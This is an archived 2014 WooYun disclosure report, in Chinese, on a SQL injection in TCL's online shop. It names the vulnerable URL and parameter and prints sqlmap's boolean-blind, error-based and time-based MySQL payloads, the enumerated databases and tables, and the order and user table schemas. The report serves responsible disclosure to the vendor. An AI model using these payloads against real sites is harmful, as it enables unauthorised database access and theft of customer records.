乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-29: 细节已通知厂商并且等待厂商处理中 2014-09-29: 厂商已经确认,细节仅向厂商公开 2014-10-09: 细节向核心白帽子及相关领域专家公开 2014-10-19: 细节向普通白帽子公开 2014-10-29: 细节向实习白帽子公开 2014-11-13: 细节向公众公开
影响大量订单数据以及用户信息泄漏风险用户量(约十万)订单数据(约3万)未做任何破坏,可查证:)希望尽快修复!!
漏洞地址:
http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515
直接报错了,那么接下来按部就班注入参数:attrs_51payload
---Place: GETParameter: attrs_51 Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: cat_id=20&attrs_51=515 RLIKE (SELECT (CASE WHEN (8708=8708) THEN 515 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat_id=20&attrs_51=515 AND (SELECT 2138 FROM(SELECT COUNT(*),CONCAT(0x716c676b71,(SELECT (CASE WHEN (2138=2138) THEN 1 ELSE 0 END)),0x7161706e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat_id=20&attrs_51=515 AND SLEEP(5)---
列数据库:
[01:06:22] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.0[01:06:22] [INFO] fetching database names[01:06:27] [INFO] the SQL query used returns 3 entries[01:06:30] [INFO] retrieved: information_schema[01:06:34] [INFO] retrieved: shoptcl[01:06:37] [INFO] retrieved: testavailable databases [3]:[*] information_schema[*] shoptcl[*] test
跑表
Database: shoptcl[152 tables]+------------------------------+| base_generate_number || c_goods_spec_index_0916 || ec_brand || ec_brand_category || ec_bulk_purchase || ec_cart || ec_category_spec || ec_category_spec_value || ec_comment || ec_comment_image || ec_consultation || ec_coupons || ec_coupons_goods || ec_coupons_use_detail || ec_custom_cat_menu || ec_evaluate || ec_evaluate_detail || ec_fenxiao_account || ec_fenxiao_copywritten || ec_fenxiao_fans_contact || ec_fenxiao_goods || ec_fenxiao_income_detail || ec_fenxiao_income_use_detail || ec_fenxiao_level || ec_fenxiao_order || ec_fenxiao_order_item || ec_fenxiao_product || ec_fenxiao_share || ec_fenxiao_share_stat || ec_fenxiao_shop_rela || ec_fenxiao_user || ec_fenxiao_user_audit || ec_fenxiao_user_cust || ec_fenxiao_withdraw || ec_freight_tpl || ec_freight_tpl_area || ec_freight_tpl_detail || ec_goods || ec_goods_collocation || ec_goods_custom_cat || ec_goods_gift || ec_goods_image || ec_goods_mapping || ec_goods_pkg || ec_goods_pkg_detail || ec_goods_pkg_image || ec_goods_relation || ec_goods_set || ec_goods_set_detail || ec_goods_spec_index || ec_group_purchase_item || ec_inventory_occupy_detail || ec_logistics_info || ec_logistics_tracking || ec_order || ec_order_discount || ec_order_item || ec_order_log || ec_order_msg_log || ec_order_refund || ec_order_refund_log || ec_payment || ec_payment_cfg || ec_product || ec_product_sku_rela || ec_product_sku_rela_0918 || ec_promotion || ec_promotion_discount || ec_promotion_integral || ec_promotion_present || ec_promotion_reduce || ec_promotion_seckill || ec_push_msg || ec_search_keword || ec_search_keyword || ec_search_log || ec_search_rela_keword || ec_search_weight_adjust || ec_search_weight_rule || ec_service_policy || ec_shop || ec_shop_category || ec_shop_sub_account || ec_spec || ec_spec_value || ec_store || ec_store_cover || ec_store_inventory || ec_store_sku || ec_transfer_account || ec_user_favorite || ec_user_history || esb_app_info || esb_app_permission || esb_msg_data || esb_msg_que || esb_service || esb_service_api || ro_resource || ro_role || ro_role_priv || ro_seller_log || ro_seller_menu || ro_subacct_role || ro_user || ro_user_address || sys_access_log || sys_admin || sys_admin_log || sys_admin_role || sys_admin_role_priv || sys_article || sys_caches || sys_category || sys_custom_category || sys_dict || sys_dict_type || sys_district || sys_email_verify_code || sys_feedback || sys_file || sys_file_server || sys_file_type || sys_image_thumbrule || sys_meta || sys_object_file || sys_point_rule || sys_position || sys_position_data || sys_position_keyword || sys_position_space || sys_poster || sys_poster_click || sys_poster_space || sys_reg_invite || sys_resource || sys_role || sys_session || sys_setting || sys_sms_sendlist || sys_sms_templates || sys_sms_verify_code || sys_template || sys_template_type || sys_user_point || sys_user_point_detail || sys_user_point_use_detail || sys_user_rank || sys_widget_callset || sys_widget_template || sys_widget_type || tmp_0916 |+------------------------------+
既然是商城,那么来看看订单表结构:)
Database: shoptclTable: ec_order[49 columns]+----------------------+---------------+| Column | Type |+----------------------+---------------+| adjust_fee | decimal(10,2) || buyer_message | varchar(255) || client_ip | varchar(50) || created_time | datetime || discount_fee | decimal(10,2) || end_time | datetime || evaluate_status | int(11) || invoice_name | varchar(255) || invoice_type | int(11) || modified_time | datetime || need_invoice | int(11) || order_discount_fee | decimal(10,2) || order_from | varchar(50) || order_id | int(11) || order_sn | varchar(64) || order_status | int(11) || pay_id | int(11) || pay_status | int(11) || pay_time | datetime || payment | decimal(10,2) || payment_code | varchar(50) || payment_type | int(11) || point_fee | decimal(10,2) || post_fee | decimal(10,2) || present_point | int(11) || print_number | int(11) || receiver_address | varchar(255) || receiver_city | varchar(50) || receiver_district | varchar(150) || receiver_district_id | int(11) || receiver_email | varchar(150) || receiver_mobile | varchar(50) || receiver_name | varchar(50) || receiver_phone | varchar(30) || receiver_state | varchar(50) || receiver_zip | varchar(20) || refund_status | int(11) || seller_email | varchar(50) || seller_memo | varchar(255) || seller_mobile | varchar(50) || seller_name | varchar(50) || seller_phone | varchar(50) || shipping_time | datetime || shop_id | int(11) || status | int(11) || total_fee | decimal(10,2) || trade_source | varchar(255) || use_point | int(11) || user_id | int(11) |+----------------------+---------------+
然后就悲剧了,发现数据量还是挺大的,接近三万啊~~有图有真相
再看看用户表,吓了一跳,近十万的用户啊~~
Database: shoptclTable: ro_user[24 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| birthday | datetime || description | varchar(400) || email | varchar(64) || email_status | tinyint(4) || encrypt | varchar(32) || gender | tinyint(4) || id | int(11) || last_ip | varchar(32) || last_login | datetime || last_time | datetime || login_num | int(11) || mobilephone | varchar(32) || modified_time | datetime || nickname | varchar(64) || password | varchar(32) || pid | varchar(20) || real_name | varchar(64) || reg_ip | varchar(32) || reg_time | datetime || status | tinyint(4) || telephone | varchar(32) || third_pintai | varchar(40) || third_uid | varchar(255) || user_name | varchar(64) |+---------------+--------------+
:)参数过滤,,另外网站的报错可以隐藏仅仅输出了部分测试数据,未破坏,未深入,然后就ctrl+c了请贵站尽快安排修复:)
危害等级:高
漏洞Rank:20
确认时间:2014-09-29 16:42
感谢您的工作,已转交相关单位确认处理。
暂无
